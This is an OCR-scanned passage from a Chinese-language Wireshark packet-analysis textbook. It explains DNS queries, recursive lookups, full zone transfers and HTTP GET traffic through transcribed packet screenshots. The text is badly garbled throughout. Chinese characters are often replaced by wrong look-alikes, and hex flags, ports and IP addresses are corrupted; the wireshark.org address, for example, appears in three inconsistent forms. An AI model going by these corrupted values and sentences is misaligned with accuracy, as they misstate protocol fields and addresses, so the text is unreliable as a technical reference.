Wireshark 合 并 成 为 了 一 个 标志 区 上 段 〈Flags section ) 。 展 开 这 个 区 段 ， 
你 会 看 到 这 个 消息 是 一 个 典型 的 请 求 : 没有 和 伏 截 断 并 且 期 户 递 归 碍 询 
(我 们 随后 将 介绍 递归 得 询 ) 。 在 展开 但 询 区 段 时 ， 里 面 也 仪 有 一 个 问 
题 。 这 个 问题 是 查询 名 字 为 wireshark.org 的 主机 类 型 (type A) 互联 网 
(IN) 地 址 。 这 个 数据 包 基 本 吏 是 在 问 :“ 哪 个 耻 地 址 对 应 痢 


wireshark.org 域 ? ” 


数据 包 2 啊 应 了 这 个 请 求 ， 如 图 9-12 所 示 。 因 为 这 个 数据 包 拥 有 了 唯 
一 的 标识 码 ， 所 以 我 们 知 姓 这 里 包含 看 对 于 原始 合 询 的 正确 啊 应 。 


羔 Wireshark . Packet 1 . dns_query_response 


Frame 1: 73 bytes on wire (584 bits), 73 bytes captured (584 bits) 
Ethernet II, Src: HonHaipr 6e:8b:24 (88:16:;ce:6e:8b:24), Dst: D-Link 21:99:4c (88:85:5d:21:99:4c) 
Internet Protocol Version 4, Src:; 192.168.9.114，Dst; 265.152.37,23 
User Datagram Protocol, Src Port: 10966 (1868), Dst Port: 53 (53) 种 
Domain Name System (guery) 
Response In: 2 
Transaction ID: 9x180f 

Y Flags; 8x8188 Standard query 办 

i Response: Message is a query 

.000 9... = Opcode: Standard query (8) 

aaa ao 四。 sss = Truncated: Message is not truncated 
Recursion desired: Do query recursively 
Z: reserved (98) 
Non-authenticated data: Unacceptable 





Questions:; 1 
Answer RRs: 作 
Authority RRs: 人 
Additional RRs: @ 
Y Queries 
Vv wireshark.org: type A, class IN 四 
Name: wireshark.org 
[Name Length; 13] 
[Label Count: 2] 
Type: A (Host Address) (1) 
Class: IN (80x000]1) 





Ne.’ I * Timer OD.O00000 "Score 192.168,0.114 ' Destinstion: 205, 152.3723 " Proreeolr DNS ' Lengeh: 73 * Info: Srandsrd query OXIED A Wireshark.corg 





图 9-11 DNS 查 询 数据 包 


顾 Wireshark . Packet 2 , dns_query_response 





Frame 2: 89 bytes on wire (712 bits), 89 bytes captured (712 bits) 
Ethernet II，Src: D-Link 21:99:4c (88:85:5d:21:99:4c), Dst: HonHaipr 6e:8b:24 (98:16:ce:6e:8b:24) 
Internet Protocol Version 4, Src: 205-152.37.23，Dst: 192.168.D.114 
User Datagram Protocol, Sre Port: 53 (53), Dst Port: 1960 (18608) 
Domain Name System (response) 
Request In: 1 
[Time: 8.891164888 seconds] 
Transaction ID: 8x1806f OO 
Y Flags: @x8188 standard query response, No error 半 
= Response: Message is a response 
Opcode: Standard query (8) 
Authoritative: Server is not an authority for domain 
Truncated: Message is not truncated 
Recursion desired: Do gquery recursively 
Recursion available: Server can do recursive queries 
Zz: reserved (8) 
Answer authenticated: Answer/authority portion was not authenticated by the server 
Non-authenticated data: Unacceptable 
Reply code: No error (9) 
Questions: 1 
© Answer RRs;: 1 
Authority RRs: 8 
Additional RRs: 8 
Y Queries 
v wireshark.org: type A, class IN 
Name: wireshark.org 
[Name Length; 13] 
[Label count:; 2] 
Type: A (Host Address) (1) 
Class: IN (8x8881) 
Y Answers 
Y wireshark.org; type A, class IN, addr 128.121.59,.122 @ 
Name: wireshark.org 
Type: A (Host Address) (1) 
Class: IN (8x8861) 
Time to live: 14400 
Data length: 4 
Address: 128.121.58.122 


No.? 2 * Time: D.D9IIE4 * Souwee: 205.152, 3723 ' Destinstion: 192. 168.0.114 * Proroeol: DNS ' Lengeh: B89 ' Infp: Srsnesve er respense DelS0F A wireshark.eve A 128, 121.50.122 





图 9-12 DNS 响应 数据 包 


标志 区 段 可 以 确保 这 是 一 个 啊 应 并 且 人 允许 必要 的 递归 。 这 个 数据 包 
仅 包含 一 个 问题 和 一 个 资源 记录 ， 因 为 它 将 原 问 题 和 回答 连接 了 起 来 。 
展开 回答 区 段 可 以 看 到 对 于 得 询 的 回答 : wireshark.org 的 地 址 是 


128.121.50. i | 了 这 个 人 信息， 客户 闪 了 束 可 以 开始 构建 卫 数 据 包 ， 并 与 
wireshark.org 进 行 通 信 了 。 


9.2.3 DNS 问题 类 型 


DNS 查询 和 响应 中 所 使 用 的 类 型 域 ， 指 明了 这 个 查询 或 者 响应 的 次 
浙 记 录 类 型 。 表 9-2 中 列 出 了 一 些 常 用 的 消息 /资源 记录 类 型 。 在 正常 流 
量 和 本 书 中 ， 你 将 会 看 到 这 些 类 型 


表 9-2 ”常用 DNS 资源 记录 类 型 


IPv4 主 机 地 址 
权威 域名 服务 占 


字符 


增 量 区 域 传送 


完整 区 域 传 送 





9.2.4 DNS 递归 


由 于 互联 网 的 DNS 结 构 是 层级 式 的 ， 因 此 为 了 能 够 回答 客户 六 提交 
的 查询 ，DNS 服 务 器 必须 能 够 彼此 通信 。 我 们 的 内 部 DNS 服 务 器 知道 本 
地 局 域 网 服务 器 的 名 字 和 IP 地 址 的 映射 ， 但 不 太 可 能 知道 Google 或 者 
Dell 的 IP 地 址 。 


当 DNS 服 务 磺 需要 得 找 一 个 下地 址 时 ， 它 会 代表 发 出 请 求 的 客户 端 
问 另 一 个 DNS 服务 器 进行 查询 。 实 际 上 ， 这 个 DNS 服务 器 与 客户 端的 行 
为 相同 。 这 个 过 程 叫 作 递归 查询 。 


打开 文件 dns_recursivequery_client.pcap， 可 以 分 别 看 到 DNS 客户 病 
和 服务 规 视 角 的 递归 奏 询 过 程 。 这 个 文件 包含 了 捕获 客户 端 DNS 流量 文 
件 的 两 个 数据 包 。 第 一 个 数据 包 是 从 DNS 客户 端 172.16.0.8 发 往 DNS 服 
务 右 172.16.0.102 的 初始 合 询 ， 如 图 9-13 所 示 。 





帮 Wireshark .Packet 1. dns_recursivedquery_client 一 口 xX 





Frame 1: 76 bytes on wire (688 bits), 76 bytes captured (688 bits) 
” Ethernet II, Src: HewlettP bf:91:ee (9860:25:b3:bf:91:ee), Dst: Vmware 92:94:9f (66:9c:29:92:943:9f) 
”Internet Protocol Version 4, Srcec: 172.16.8.8, Dst: 172.16.8.1082 
YY User Datagram Protocol, Src Port: 56125 (56125), Dst Port: 53 (53) 
Source Port: 36125 
Destination Port: 53 
Length: 42 
Y Checksum: @x58ca [validation disabled] 
[Goo0d Checksum: False] 
[Bad Checksum: False] 
[Stream index: ©] 
v Domain Name System (query) 
[Response In: 2 
Transaction ID: 8@x8b34 
YY Flags: Gx8188 Standard query 
Os se = Response: Message is a query 
.8008 0... .... .... = Opcode: Standard query (6) 
,0B, oo = Truncated: Messape is not truncated 
a 1 ...- .... = Recursion desired: Do query recursively @ 
a d (8) 
sa .= Non-authenticated data: Unacceptable 
Questions: 1 
Answer RRs: 9 
Authority RRs: 8 
Additional RRs: 8 
YY Queries 
v waiw.nostarch.com: type A, class IN © 
Name: www.nostarch .com 
[Name Length: 16] 
[Label Count: 3] 
Type: A (Host Address) (1) 
Class: IN 【9xeoo1l) 








No.r I Time: HOONOOD .5ourrer 172,16.0.8 " Destination: 172,16.0,102 " Protoceol: DNS ' Length: 76 * Imfo: Standard query OBb 3 A Ww wnostarch,com 





Close Help 





图 9-13 ”设置 有 期 望 递归 位 的 DNS 碍 询 


当 你 展开 这 个 数据 包 的 DNS 区 段 时 ， 可 以 看 到 这 是 一 个 用 以 查找 
DNS 名 称 www.nostarch.com 的 A 类 型 记录 的 标准 得 询 。 展 开标 志 区 段 ， 
可 以 了 解 更 多 关于 这 个 数据 包 的 信息 ， 你 可 以 看 到 期 望 了 递归 的 标 兰 。 


RE 如 图 9- 
14 订 不。 


这 个 数据 包 的 事务 ID 和 我 们 的 查询 相 匹 配 ， 也 没有 列 出 错误 ， 所 以 
我 们 就 得 到 www.nostarch.com 所 对 应 的 A 类 型 资源 记 孙 。 


奖 Wireshark . Packet 2 dns_recursiveqUery_client 





Frame 2: 92 bytes on wire (736 bits), 92 bytes captured (736 bits) 
> Ethernet II, Src: Vmware 92:94:9f (8@8:08c:29:92:94:9f), Dst: HewlettP bf:91:ee (80:25:b3:bf:91:ee) 
”Internet Protocol Version #4, Src: 172.16.6.192，Dst: 172.16.8.8 
User Datagram Protocol, src Port: 53 (53), Dst Port: 56125 (56125) 
v Domain Name System (response) 
[Request In: 1 
[Time: 8.1831348688 seconds ] 
Transaction ID: 9x8b34 @ 
Flags: @x8188 Standard query response, No error 
.. = Response: Message is a response 
..。= Opcode: Standard query (8) 
.= Authoritative: Server is not an authori 
...。= Truncated: Message is not truncate 
.= Recursion desired: i 
.= = Recursion availa - 
=» = Z: reserved (8) 
.= Answer authenticated: Answer/authority portion was not authenticated by the server 
= Non-authenticated data: Unacceptable 
= Reply code: No error (8) 
Questions: 1 
Answer RRs: 1 
Authority RRs: 名 
Additional RRs: @ 


.nostarch.com: type A, class IN 
Name: www.nostarch.com 
[Name Length: 16] 
[Label Count: 3] 
Type: A (Host Address) (1) 
Class: IN (0x88861) 

YY Answers 

Y www.nostarch.com: type A, class IN, addr 72.32.92.4@ 

Name: Www.nostarch.com 
Type: A (Host Address) (1) 
Class: IN (8x8881) 
Time to live: 3688 
Data length: 4 
Address: 72.32.92.4 








No,: 2 " Time: W183134 * Sowce: 172,16.0. 102 " Destination: 172.,16.0.8 " Protweol: DNS * Lengih: 92 " Infos Siandsr query response (Bb 34 A ww nostiarch.cmm A 72,32,.92.4 





图 9-14 DNS 查询 响应 


如 果 我 们 想 要 知道 得 询 是 佣 被 递归 应 答 ， 叭 一 的 方法 束 是 当 进 行 递 

归 查 询 时 监 昕 DNS 服务器 的 流量 ， 正 如 文件 
dns_recursivequery_server.pcap 中 所 示 的 那样 。 这 个 文件 显示 了 查询 进行 
时 本 地 DNS 服 务 占 流量 的 捕获 ， 如 图 9-15 所 示 。 第 一 个 数据 包 和 我 们 前 
一 个 捕获 文件 中 的 初始 查询 相同 。 这 时 ，DNS 服 务 占 接 到 了 这 个 查询， 
在 其 本 地 数据 包 检 查 后 ， 发 现 它 并 不 知道 关于 DNS 域 名 

Cnostarch.com) 所 对 应 IP 地 址 这 个 问题 的 答 宁 。 由 于 这 个 数据 包 发 过 
时 设置 了 期 望 递 与 ， 困 此 你 会 在 第 二 个 数据 包 中 看 到 ， 这 个 DNS 服务 器 
为 了 得 到 答案 向 其 他 DNS 服务 器 询问 这 个 问题 。 





图 9-15 ”从 服务 器 的 角度 进行 DNS 查 询 


在 第 二 个 数据 包 中 ， 位 于 172.16.0.102 的 DNS 服务 器 向 4.2.2.1， 也 就 
是 其 所 设 定 的 要 转 肥 上 行 请 求 的 服务 碳 ， 及 大 了 一 个 新 的 查询 ， 如 图 9- 
16 所 示 。 这 个 请 求 是 原始 的 镜像 ， 并 将 DNS 服务 器 变 成 一 个 客户 端 。 


厅 Wireshark . Packet 2. dns_recursivequery_server 


> Frame 2: 76 bytes on wire (688 bits), 76 bytes captured (688 bits) 
> Ethernet II, Src: Vmware 92:94:9f (880:8c:29:92:94:9f), Dst: CiscoInc 31:87:33 (88:26:8b:31:87:33) | 
> Internet Protocol Version 4, Src: 172.16.90.182, Dst: 4.2.2.1 
User Datagram Protocol, Src Port: 62578 (62578), Dst Port: 53 (53) 
Y Domain Name System (query) 
[Response In: 3] 
Transaction ID: 8xf34d © 
>» Flags: Gx8188 Standard query 
Questions: 1 
Answer RRs: 台 
Authority RRs: @ 
Additional RRs: @ 
Y Queries 
Y_ ww.nostarch.com: type A, class IN 
Name: www.nostarch . com 


[Name Length: 16] 

[Label Count: 3] 

Type: A (Host Address) (1) 
Class: IN (8x8881) 





No,: 2 " Time: 0.000379 * Sourre: 172.,16,.0.102 " Destnation: $.2.2.1 " Protoeo: DNS " Lengthr 76 " Inio: Standard query gt A Ww Wnoastarch. Com 


Close 





图 9-16 ”递归 DNS 碍 询 


由 于 这 个 事务 ID 与 之 前 捕获 文件 中 的 事务 ID 不 同 ， 因 此 我 们 可 以 将 
它 作 为 一 个 新 的 查询 。 在 这 个 数据 包 被 服务 器 4.2.2.1 接 收 之 后 ， 本 地 
DNS 服 务 硕 就 接 到 了 啊 应 ， 如 图 6-17 所 示 。 


接 到 了 这 个 响应 后 ， 本 地 DNS 服务 器 就 可 以 将 第 四 个 ， 也 就 是 最 后 
一 个 带 有 请 求 信息 的 数据 包 传递 给 DNS 客户 端 


虽然 这 个 例子 只 展示 了 一 层 的 递归 ， 但 对 一 个 DNS 请 求 来 说 递归 得 
询 可 能 会 发 生 很 多 次 。 这 里 我 们 接 到 了 来 和 目 DNS 服 务 器 4.2.2.1 的 回答 ， 
但 那个 服务 器 可 能 为 了 寻找 答案 也 同 其 他 服务 器 进行 了 递归 查询 。 一 个 
简单 查询 在 其 得 到 最 终 啊 应 之 前 可 能 过 历 了 全 世界 。 图 9-18 展 示 了 递归 
DNS 奏 询 的 过 程 。 


磊 Wireshark .Packet 3 . dns_recursivequery_server 





Frame 3: 92 bytes on wire (736 bits), 92 bytes captured (736 bits) 
Ethernet II, Src: CiscoInc 31:87:33 (88:26:8b:31:87:33), Dst: Vmware 92:94:9f (88:8c:29:92:94:9f) 
"Internet Protocol Version 4, Src: 4.2.2.1, Dst: 172.16.0.1862 
User Datagram Protocol, Src Port: 53 (53), Dst Port: 625768 (62579 ) 
Y Domain Name System (response) 
Request In: 2 
[Time: 8.182223888 seconds] 
Transaction ID: @xf34d 
Flags: 9x8189 Standard query response, No error 
Questions: 1 
Answer RRs: 1 
Authority RRs: 9 
Additional RRs: 9 
Y Queries 
YY ww.nostarch.com: typc A，class IN 
Name: www.nostarch .com 
[Name Length: 16] 
[Label Count: 3] 
Type: A (Host Address) (1) 
Class: IN (8x8881) 
Y Answers 
YY www.nostarch.com: type A, class IN, addr 72.32.92.4 
Name: www.nostarch .com 
Type: A (Host Address) (1) 
Class: IN (6x8881) 
Time to live: 3600 
Data length: 4 
Address: 72.32.92.4 











No.: 3 * Time: 0, 182802 * Source: $2.2,1 * Destination: 172,16.0,102 * Protocol: DNS * Length: 92 * Info: Standsrd query response O340 A ww wnostarch,com A 72,32,.92 





图 9-17 ”对 递归 DNS 查询 的 响应 


本 地 DNS 服务 书 外 地 DNS 服 务 话 





图 9-18 ”DNS 递归 查询 


9.2.5 ”DNS 区域 传达 


DNS 区 域 是 一 个 DNS 服务 需 所 授权 管理 的 名 字 空 间 《〈 或 是 一 组 DNS 
名 称 ) 。 举 例 来 说 ，Emma's Diner 这 个 网 站 可 能 由 一 个 DNS 服务 器 对 
emmasdiner.com 人 人 负责。 这样， 无论 是 Emma’s Diner 内 部 或 者 外 部 的 设 
备 ， 如 果 和 布 望 将 emmasdiner.com 解 析 成 卫 地 址 ， 都 需要 和 这 个 区 域 的 权 
威 ， 也 就 是 这 个 DNS 服 务 占 联系 。 如 果 Emma’s Diner 发 展 壮 大 了 ， 它 可 
能 会 增加 一 个 DNS 服 务 器 ， 专 门 用 来 处 理 其 名 字 空 间 的 email 部 分 ， 比 
如 mailemmasdiner.com， 那 么 这 个 服务 右 ， 惑 成 为 这 个 邮件 子 区 域 的 权 
ee 还 可 以 为 子 域名 琴 加 更 多 的 DNS 服务 硕 ， 如 图 9- 
19 月 [ 泵 。 







emmasdiner.com 


web.emmasdiner.com 


db.web.emmasdiner.com 
cart.web.emmasdiner.com 


mail.emmasdiner.com 


图 9-19 DNS 区 域 划 分 名 称 空 间 的 贡 任 


区 域 传 送 指 的 是 通 第 出 于 元 余 备 份 的 需要 ， 在 两 人 台 设 备 之 间 传 送 区 
域 数 据 。 举 例 来 说 ， 在 拥有 多 个 DNS 服务 器 的 组 织 中 ， 管 理 员 通 常 都 会 
配置 一 人 备用 DNS 服务 硕 ， 用 来 维护 一 份 主 服务 器 DNS 信息 的 副本 ， 以 
防止 主 DNS 服 务 器 不 可 用 。 主 要 存在 两 种 区 域 传 送 。 


完 束 区 域 传 大 〈《AXFR) : 这 个 类 型 的 传 过 将 整个 区 域 在 设备 间 进 
行 传达 。 

增 量 区 域 传 送 〈IXFR) : 这 个 类 型 的 传 运 仅 传 过 区 域 信息 的 一 部 
人 


文件 dns_axfr.pcap 包 含 了 一 个 主机 172.16.16.164 和 172.16.16.139 之 间 
进行 完整 区 域 传送 的 例子 。 


当 第 一 眼看 这 个 文件 时 ， 你 可 能 会 怀疑 是 个 开 错 了 文件 ， 因 为 你 所 
见 到 的 是 TCP 数 据 包 而 不 是 UDP 数 据 包 。 虽 然 DNS 基 于 UDP 协 议 ， 但 它 
在 比如 区 域 传送 的 一 些 任 务 中 也 会 使 用 TCP 协 议 ， 因 为 TCP 对 于 规模 数 
| 这 个 捕获 文件 中 的 前 3 个 数据 包 是 TICP 的 三 次 握 


第 四 个 数据 包 开 始 在 172.16.16.164 和 172.16.16.139 之 间 进 行 实 际 的 
区 域 传 送 。 这 个 数据 包 并 不 包含 任何 DNS 信息 。 由 于 区 域 传 送 请 求 的 数 


据 包 中 的 数据 由 多 个 数据 包 所 发 送 ， 因 此 这 个 数据 包 被 标记 为 重组 装 
PDU 的 TCP 分 片 。 数 据 包 4 和 6 包 令 了 数据 包 的 数据 。 数 据 包 5 是 对 于 数 
据 包 4 被 成 功 接收 的 确认 。 这 些 数 据 包 以 这 种 方式 显示 出 来 是 因为 
Wireshark 出 于 可 读 性 的 考虑 将 TCP 数 据 包 如 此 解析 并 呈现 。 这 里 我 们 
可 以 将 数据 包 6 作 为 完整 的 DNS 区 域 传 送 请 求 ， 如 图 9-20 所 示 。 


区 域 传送 请 求 是 典型 的 查询 ， 但 它 请 求 的 是 AXFR 类 型 而 不 是 单一 
记录 疾 型 ， 这 意味 看 它 禹 望 从 服务 硕 接 收 全 部 DNS 区 域 。 服 务 套 在 数据 
包 7 中 回复 了 区 域 记录 ， 如 图 9-21 所 示 。 正 如 你 所 见 到 的 那样 ， 区 域 传 
达 包 售 了 相当 多 的 数据 ， 并 且 这 还 是 一 个 很 简单 的 例子 ! 在 区 域 传送 完 
成 之 后 ， 捕 获 文件 以 TCP 连 接 的 终止 过 程 作为 结 





是 Wireshark , packet 6, dns_axfr 二 口 XxX 
Frame 6: 87 bytes on wire (696 bits), 87 bytes captured (696 bits) 
Ethernet II, Src: VmWare ve:ec:a4 (80:8c:29:;7e;ec;a4), Dst: Vmware ce:dl:9e (88:8c:29:;ce:dl:9e) 
Internet Protocol Version 4, Src: 172.16.16.164, Dst: 172.16.16.139 
en 33 


Transmission Control Protocol, Src Port: 1188 (1188), Dst Port: 53 (53), Seq: 15787864528, Ack: 451899283, L 
[2 Reassem bled TCP Segments (35 bytes): #4(2), #6(33)] 
YY Domain Name System (query) 

Response In: 7 

Leneth: 33 

Transaction ID: 8x8887 

Flags:; 8x8198 Standard query OO 

Questions: 1 

Answer RRs: 用 

Authority RRs: ® 

Additional RRs: @ 
Y Queries 


Y contoso,local: type AXFR, class IN 
e: contoso.local 


@ Type: AXFR (transfer of an entire zone) (252) 
Class: IN (68x8801) 








No.s § * Time: 0.218856 ' Source: 172.16.16.164 ' Destinstiom 172.16.16.139 * Protoeol: DNS: * Length: B87 * Info: Srandsre query’ ONOOUT AXFR comoso. loesl 


Help 








图 9-20 ” ”DNS 完整 区 域 传送 请 求 


Fi Wireshark . Packet 7 . dns_axfr 





Frame 7: 1218 bytes on wire (9686 bits), 1218 bytes captured (9688 bits) 
Ethernet II, Src: Vmware_ce:dl1:9e (80:8c:29:ce:di:9e), Dst: Vmware_7e:ec:a4 (08:8c:29:7e:ec:a4) 


> Internet Protocol Version 4, Src: 172.16.16.139, Dst: 172.16.16.164 
» Transmission Control Protocol, Src Port: 53 (53), Dst Port: 1108 (1168), Seq: 451899203, Ack: 15786784561, Len: 1156 
Y Domain Name System (response) 
[Request In: 6 
[Time: 9.921769666 seconds] 
Length: 1154 
Transaction ID: 9x0667 
Flags: 9x8186 Standard query response, No error 
Questions: 1 
Answer RRs: 21 
Authority RRs: 9 
Additional RRs: 9 
Queries 
Y contoso.local: type AXFR, class IN 
Name: contoso,.local 
[Name Length: 13] 
[Label Count: 2] 
Type: AXFR (transfer of an entire zone) (252) 
Class: IN (8x80601) 
Y Answers 
contoso. local: type SOA, class IN, mname dns3.contoso.local 
contoso.local: type A, class IN, addr 172.16.16.139 
contoso.local: type NS, class IN, ns dns3.contoso.local 
>》 msdcs.contoso.local: type NS, class IN, ns csanders-9ceael.contoso.]local 
» Bc. tcp.Default-First-Site-Name, sites.contoso,local: type SRV, class IN, priority 0, weight 199，port 3268, target dns3.contoso.local 
» kerberos. tcp.Default-First-Site-Name. sites.contoso.local: type SRV, class IN, priority 0, weight 1860, port 88, target dns3.contoso.local 
» _1dap. tcp.Defaulit-First-Site-Name. sites.contoso.local: type SRV, class IN, priority 08, weight 180, port 389, target dns3.contoso.local 
》 gC-._tcp.contoso.local: type SRV, class IN, priority 8, weight 196，port 3268, target dns3.contoso.local 
_kerberos. tcp.contoso,.local: type SRV, class IN, priority 8@, weight 109，port 88, target dns3.contoso,.local 
» kpasswd. tcp,.contoso.local: type SRV, class IN, priority 8, weight 180, port 464, target dns3.contoso,.local 
” _ldap. tcp.contoso.local: type SRV, class IN, priority 8@, weight 108, port 389, target dns3.contoso.local 
> _kerberos. udp.contoso.local: type SRV, class IN, priority 8, weight 100, port 88, target dns3.contoso.local 
> _kpasswd._udp.contoso.local: type SRV, class IN, priority 0, weight 190，port 464, target dns3.contoso.local 
dns3.contoso. local: type A, class IN, addr 172.16.16.139 
y DomainDnszZones.contoso.local: type A, class IN, addr 172.16.16.139 
” ldap. tcp.Default-First-Site-Name. sites.DomainDnsZones.contoso.local: type SRV, class IN, priority 6, weight 160, port 389, target dns3.contoso.local 
> _ldap. tcp.DomainDnsZones.contoso.local: type SRV, class IN, priority 08, weight 188, port 389, target dns3.contoso.local 
> ForestDnsZones.contoso.local: type A, class IN, addr 172.16.16.139 
》 ldap. tcp.Default-First-Site-Name, sites,.ForestDnszZones.contoso,local: type SRV, class IN, priority 08, weight 180, port 389, target dns3.contoso.local 
” ldap. tcp.ForestDnsZones.contoso.local: type SRV, class IN, priority 6, weight 108, port 389, target dns3.contoso.local 
contoso.local: type SOA, class IN, mname dns3.contoso.local 








No.: 7 “ Time: 0.240425 * Source: 172.16.16.139 * Desenavon 172.156.16.164 * Proewveot: DNS * Lengeh: 1210 * Info: Srancard query resp... Y 0 100 389 ens3.comoso.local A 172,16.16.139 SRV 0 100 389 dns3.comoso. ccal SRY O 100 389 dha}.comoso. beal SOA chsi.comose 





图 9-21 正在 进行 的 DNS 完整 区 域 传 送 


区 域 传 运 的 数据 如 果 落 入 他 人 手中 可 能 会 很 危险 。 举 例 来 说 ， 通 过 枚 举 一 个 DNS 服 务 
名 ， 你 可 以 绘 出 整个 网 络 的 基础 结构 。 





9.3 ” 超 文 本 传输 协议 


超 文本 传输 协议 (Hypertext Transfer Protocol, HITP) 是 万 维 网 
(World Wide Web) 的 传输 机 制 ， 人 允许 浏 宽 需 通 过 连接 Web 服 务 亏 浏览 
网 页 。 目 前 在 大 多 数组 织 中 ，HTTP 流 量 在 网 络 中 所 占 的 比率 是 最 高 
的 。 每 一 次 使 用 Google 搜 索 、 连 接 Twitter、 有 发 一 条 做 博 ， 或 者 在 ESPN 
上 查看 肯塔基 大 学 的 篮球 比分 ， 你 都 会 用 到 HTTP。 


我 们 不 会 去 看 HTTP 传 输 的 数据 包 结 构 ， 因 为 有 着 不 同 目 的 的 数据 
A 这 个 任务 就 留 给 你 了 。 这 里 ， 我 们 来 看 HTTP 的 
实际 应 用 。 


9.3.1 使 用 HTTP 浏 多 


HTTP 常 被 用 来 浏览 Web 服 务 器 上 使 用 浏览 器 访问 的 网 页 。 捕 获 文 
件 http_google.pcap 就 给 出 这 样 一 个 使 用 TCP 作 为 传输 层 协 > 的 HTTP 
传输 的 例子 。 通 信 以 客户 端 172.16.16.128 和 Google 的 Web 服 务 
74.125.95.104 的 三 次 握手 开始 。 


在 ee 第 一 个 被 标 为 HTTP 的 数据 包 从 客户 问 发 往 服 


HTTP 数 据 包 通过 TCP 人 说 传输 到 服务 右 的 80 闹 口 ， 也 就 是 HTTP 通 信 
的 标准 端口 (8080 端 口 也 常 被 使 用 ) 。 


HTTP 数 据 包 会 被 确定 为 8 种 不 同 请 求 方法 中 的 一 种 (根据 HTTP 规 
范 版 本 1.1 的 定义 ) 。 这 些 请 求 方法 指明 了 数据 包 肥 送 者 想 要 对 接收 者 
采取 的 动作 。 如 图 9- 22 所 示 ， 这 个 数据 包 的 方法 是 GET， 它 请 求 /作为 通 
用 资源 标识 符 (Uniform Resource Indicator) ， 并 且 请 求 版 本 是 
HTTP/1.1。 这 些 信息 告诉 我 们 这 个 客户 闹 请 求 使 用 HTTP 的 1.1 版 本 ， 下 
载 Web 服 务 器 的 根 目 录 (/) 。 


接 下 来 ， 主 机 同 Web 服 务 需 有 发 大 关于 上 自己 的 信息 。 这 些 信息 包含 了 
下 在 使 用 的 用 户 代 理 ( 浏 贤 颖 ) er (Accept 
Languages) 和 Cookie 信 息 (位 于 捕获 的 底部 。 为 保证 脱 容 性 ， 服 务 
项 可 以 利用 这 些 信息 ， 决定 返回 给 客户 端的 数据 


故 Wireshark . packet 4. http_google 





» Frame 4: 681 bytes on wire (5448 bits), 681 bytes captured (5448 bits) 
》 Ethernet II, Src: IntelCor 5b:7d:4a (806:21:6a:5b:7d:4a), Dst: D-Link 21:99:4c (69:05:5d:21:99:4c) 
» Internet Protocol Version 4, Src: 172.16.16.128, Dst: 74.125.95.104 
> Transmission Control Protocol, Src Port: 1686 (1686), Dst Port: 89 (88), Seq; 2882691768, Ack: 2775577374, Len: 627 
Y Hypertext Transfer Protocol 
v HET A HTTP/T-1MrMn 
> [Expert Info (Chat/Sequence): GET / HTTP/1.1\r\n] 
Request Method: GET 
@ Request URI: / 
Request Version: HTTP/1.1 
Host: www.google.com\r\n 
User-Agent: Mozilla/5.8 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) Gecko/28891221 Firefox/3.5.7\r\n 
Accept: text/htm],application/xhtml+xml,application/xml;q=8.9,*/*;q=@.8\r\n 
Accept-Language: en-us,en;q=8.5\r\n 
Accept-Encoding: gzip,deflate\r\n 
Accept-Charset: ISO-8859-1,utf-8;q=8.7,*;9=8.7\r\n 
Keep-Alive: 368\r\n 
Connection: keep-alive\r\n 
[truncated]Cookie: PREF=ID=257913a938e6c248:U=267c896b5f39fb@b:FF=4:LD=en:NR=18:TM=126873@654:LM=1265479336:GM=1:S5.. 
\r\n 
Full] request URI: http://www.google.com/ 


[HTTP request 1/1] 


Response in frame: 12 








No,s 4 * Time: 0.030248 * Source: 172,16,16,128 * Destnabon: 74,125,95,104 ' Protoeol: HTTP * Length: B91 * Info: GET / NTT 了 





图 9-22 ”初始 HTTP GET 请 求 数据 包 


当 服 务 器 接收 到 了 数据 包 4 中 的 HITP 请 求 时 ， 它 会 响应 一 个 TCP 
ACK， 用 以 确认 数据 包 ， 并 在 数据 包 6~~11 中 传输 所 请 求 的 数据 。HTTP 
只 被 用 来 解决 客户 器 和 服务 右 的 应 用 层 命 仿 。 当 进行 数据 传输 时 ， 际 了 
数据 流 的 开始 和 结束 束 看 个 到 应 用 层 的 控制 信息 了 。 


服务 右 在 数据 包 6 和 7 中 发 送 数 据 ， 数 据 包 8 是 来 目 客 户 帝 的 确认 ， 
数据 包 9 和 10 是 另外 两 个 数据 包 ， 数 据 包 11 是 另外 一 个 确认 ， 如 图 9-23 
所 示 。 虽 然 HITTP 仍 然 负 责 这 些 传输 ， 但 所 有 这 些 数 据 包 在 Wireshark 中 
都 被 显示 为 TCP 分 所 而 不 是 HTTP 数据 包 。 


Time Source Destination Protocol Length Info 





“" 74.125.95.164 
em JF4.125.95.104 
a 1216.16.128 
.4.125.95 .1094 
=- J4.125.95.104 
T1615.1253 


图 9-23 ”客户 闹 浏 览 右 


在 数据 传输 结束 后 ， 数 据 的 重组 汪 沉 束 已 经 锐 友 运 完 了 ， 如 图 9-24 


172.16.16.128 
172.16.16.128 
74.125.95 .104 
172.16.16.128 


172.16.16.128 
74.125.95.1684 


BA) 


TEP 
TeP 
TE 
全 
TCP 
EP 


1468 [TCP segment of a reassembled PDU] 
1468 [TCP segment of a reassembled PDU] 
54 1686 > 89 LACK] Seq=2882692395 Ack=2775588186 Win=16872 Len=8 
1468 [TCP segment of a reassembled PDU] 
156 [TCP segment of a reassembled PDU] 
54 1686 > 89 | ACK] Seq=2882692395 Ack=2775581694 Win=16872 Len=8 





和 和 Web 服务 器 之 间 在 使 用 TCP 传 输 数 据 





左 Wireshark . Packet 12, http_google 





e 12; 591 bytes e (4728 bits), 591 bytes captured (4728 bits) 

, ee et II, Src: D-Li i 21:99:4c (88:85:5d:21:99:4c), Dst: IntelCo _Sb:7d:4a (8@0:21:6a:5b:7d:4a) 
和 ix 上 Bi = otocol Version 4，Src: 74.125.95.164，Dst: 172.16.16.128 
> Sr i n Control otocol, Src Port: 88 (88), Dst Port: 1686 (1686), Seq: 2775581694, Ack: 2882692395, Len: 537 

[5 ops d TCP Segments (4857 bytes): #6(1486), #7(1486), #9(1486), #16(182), #12(537)] 
Y Hypertext Transfer Protocol 

Y HTTP/1.1 288 OK\r\n 

> Ex po rt Info (Chat/Sequence): HTTP/1.1 288 OK\r\n] 
st Version: ee a 


Cache-Control: private, max-age=0\r\n 
Content-Type: te xt/htn 1; charset=UTF-8\r\n 
Content-Encoding: gzip\r\n 
Server ee rn 
v Content-Length: 4633\r\n 
[Content length: 4633] 
X-XSS-Protection: ©@\r\n 








Request in rame: 
Content-encoded e ey td ip): 4633 bytes -> 11368 bytes 
» Line-bas a text data: text/ht 








No.: 12 - Time: 0.134395 + Source: 74.125,95,104 - Destination® 172.16. 128.128 « Protocok: HTTP length: S91 - Inio: HTTPYY,1 200 OW [tex hirm)) 








